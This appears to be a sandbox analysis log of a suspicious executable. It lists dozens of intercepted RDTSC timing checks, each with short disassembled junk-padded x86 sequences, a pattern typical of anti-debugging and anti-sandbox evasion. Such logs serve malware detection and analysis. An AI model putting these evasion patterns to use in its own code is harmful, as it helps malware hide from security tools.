Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 718B2B second address: 718B41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCA94C93E3Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70775B second address: 707761 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 736F87 second address: 736F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737262 second address: 73726C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCA94618466h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73726C second address: 73727C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCA94C93E3Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737808 second address: 73780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737936 second address: 73794D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCA94C93E36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jbe 00007FCA94C93E36h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737D97 second address: 737D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 737D9D second address: 737DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 711770 second address: 711777 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73804C second address: 73805D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 jne 00007FCA94C93E3Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73805D second address: 738063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 738063 second address: 738068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 738068 second address: 738089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCA94618466h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007FCA9461846Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F2B5 second address: 73F2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73F2B9 second address: 73F2BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73E873 second address: 73E877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74454D second address: 744566 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FCA94618468h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744703 second address: 744709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744C38 second address: 744C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744DF7 second address: 744E27 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FCA94C93E42h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007FCA94C93E3Dh 0x00000018 popad 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744F9C second address: 744FB8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCA94618466h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007FCA9461846Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 744FB8 second address: 744FBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746F85 second address: 746F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746F8E second address: 746F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746F92 second address: 746FFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCA94618466h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jne 00007FCA94618477h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FCA9461846Eh 0x0000001b mov eax, dword ptr [eax] 0x0000001d push edi 0x0000001e jmp 00007FCA94618478h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FCA94618472h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 746FFE second address: 747003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747720 second address: 747768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94618477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FCA94618477h 0x0000000f jmp 00007FCA94618471h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCA94618470h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747768 second address: 747772 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCA94C93E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747772 second address: 747779 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747832 second address: 747850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCA94C93E49h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 747850 second address: 747856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74804C second address: 748052 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A1DC second address: 74A1F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCA94618468h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74A1F1 second address: 74A1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 749A00 second address: 749A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA9461846Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FCA9461846Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74C361 second address: 74C366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74B591 second address: 74B596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74C366 second address: 74C36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 74C36C second address: 74C370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750AAA second address: 750AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 750AB0 second address: 750AC2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jnp 00007FCA9461846Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A58 second address: 751A6A instructions: 0x00000000 rdtsc 0x00000002 js 00007FCA94C93E38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A6A second address: 751A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A70 second address: 751A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A75 second address: 751A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751A7B second address: 751A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752984 second address: 752A16 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCA94618476h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FCA94618471h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FCA94618468h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c add ebx, dword ptr [ebp+122D36A0h] 0x00000032 push 00000000h 0x00000034 mov ebx, eax 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FCA94618468h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 00000016h 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 sub edi, 278B471Fh 0x00000058 push eax 0x00000059 push edi 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FCA94618473h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7548C0 second address: 7548CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 751C36 second address: 751CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCA94618468h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 jno 00007FCA9461846Ch 0x0000002b push dword ptr fs:[00000000h] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007FCA94618468h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000019h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c xor bx, CEABh 0x00000051 mov dword ptr fs:[00000000h], esp 0x00000058 mov edi, dword ptr [ebp+122D18DEh] 0x0000005e mov eax, dword ptr [ebp+122D0929h] 0x00000064 mov edi, dword ptr [ebp+122D3748h] 0x0000006a push FFFFFFFFh 0x0000006c mov di, dx 0x0000006f nop 0x00000070 jmp 00007FCA9461846Eh 0x00000075 push eax 0x00000076 push ebx 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752BBF second address: 752BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753AB4 second address: 753ABE instructions: 0x00000000 rdtsc 0x00000002 je 00007FCA9461846Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7549E4 second address: 754A0A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCA94C93E49h 0x00000008 jmp 00007FCA94C93E43h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752BC3 second address: 752BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 753ABE second address: 753B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 movzx ebx, ax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FCA94C93E38h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d sub dword ptr [ebp+122D35FEh], edx 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a jmp 00007FCA94C93E3Fh 0x0000003f mov eax, dword ptr [ebp+122D0A2Dh] 0x00000045 push 00000000h 0x00000047 push ebp 0x00000048 call 00007FCA94C93E38h 0x0000004d pop ebp 0x0000004e mov dword ptr [esp+04h], ebp 0x00000052 add dword ptr [esp+04h], 0000001Ah 0x0000005a inc ebp 0x0000005b push ebp 0x0000005c ret 0x0000005d pop ebp 0x0000005e ret 0x0000005f jno 00007FCA94C93E37h 0x00000065 mov bx, FDB2h 0x00000069 push FFFFFFFFh 0x0000006b xor dword ptr [ebp+122D31ADh], esi 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FCA94C93E48h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75663A second address: 75663F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 754A0A second address: 754A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752BC9 second address: 752BD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FCA94618466h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7566D6 second address: 7566E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCA94C93E36h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 752BD4 second address: 752C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bl, A9h 0x0000000a push dword ptr fs:[00000000h] 0x00000011 mov ebx, dword ptr [ebp+12475B95h] 0x00000017 mov dword ptr fs:[00000000h], esp 0x0000001e or edi, 046BF531h 0x00000024 mov eax, dword ptr [ebp+122D0619h] 0x0000002a sub edi, 2FA68224h 0x00000030 push FFFFFFFFh 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FCA94618468h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c and edi, 50A68970h 0x00000052 mov ebx, dword ptr [ebp+122D374Ch] 0x00000058 nop 0x00000059 push eax 0x0000005a push edx 0x0000005b jo 00007FCA9461846Ch 0x00000061 jp 00007FCA94618466h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756817 second address: 75682A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCA94C93E36h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75789C second address: 7578A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75682A second address: 756830 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 756830 second address: 75683A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCA94618466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7578A0 second address: 757936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA94C93E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov bx, 7705h 0x00000017 mov edi, 46D47A92h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 sub dword ptr [ebp+122D1AE6h], eax 0x00000029 pushad 0x0000002a jmp 00007FCA94C93E47h 0x0000002f jbe 00007FCA94C93E38h 0x00000035 popad 0x00000036 mov eax, dword ptr [ebp+122D0F15h] 0x0000003c jne 00007FCA94C93E3Ch 0x00000042 push FFFFFFFFh 0x00000044 mov ebx, dword ptr [ebp+122D39B0h] 0x0000004a pushad 0x0000004b ja 00007FCA94C93E38h 0x00000051 mov ecx, ebx 0x00000053 sub al, 00000003h 0x00000056 popad 0x00000057 nop 0x00000058 pushad 0x00000059 push edi 0x0000005a pushad 0x0000005b popad 0x0000005c pop edi 0x0000005d pushad 0x0000005e push edi 0x0000005f pop edi 0x00000060 push edx 0x00000061 pop edx 0x00000062 popad 0x00000063 popad 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jnc 00007FCA94C93E36h 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75A61C second address: 75A638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94618478h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 757936 second address: 75793B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D78A second address: 75D791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C94E second address: 75C954 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D791 second address: 75D7F6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCA9461846Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or dword ptr [ebp+122D1D59h], edx 0x00000013 mov ebx, dword ptr [ebp+122D1B00h] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d mov di, ax 0x00000020 call 00007FCA94618470h 0x00000025 call 00007FCA94618477h 0x0000002a pop ebx 0x0000002b pop ebx 0x0000002c xchg eax, esi 0x0000002d jnc 00007FCA94618470h 0x00000033 push eax 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75C954 second address: 75C96F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA94C93E47h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D7F6 second address: 75D801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75D801 second address: 75D805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75E8D8 second address: 75E8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCA94618466h 0x0000000a popad 0x0000000b jnp 00007FCA9461846Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75F8EB second address: 75F90D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jg 00007FCA94C93E36h 0x00000014 jmp 00007FCA94C93E3Dh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 75EA5E second address: 75EA64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766B1D second address: 766B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FCA94C93E36h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 766B2A second address: 766B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FCA94618476h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70E260 second address: 70E2AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCA94C93E3Dh 0x0000000b jmp 00007FCA94C93E40h 0x00000010 popad 0x00000011 js 00007FCA94C93E62h 0x00000017 push edi 0x00000018 jg 00007FCA94C93E36h 0x0000001e jmp 00007FCA94C93E46h 0x00000023 pop edi 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 769FFD second address: 76A008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCA94618466h 0x0000000a pop esi 0x0000000b rdtsc
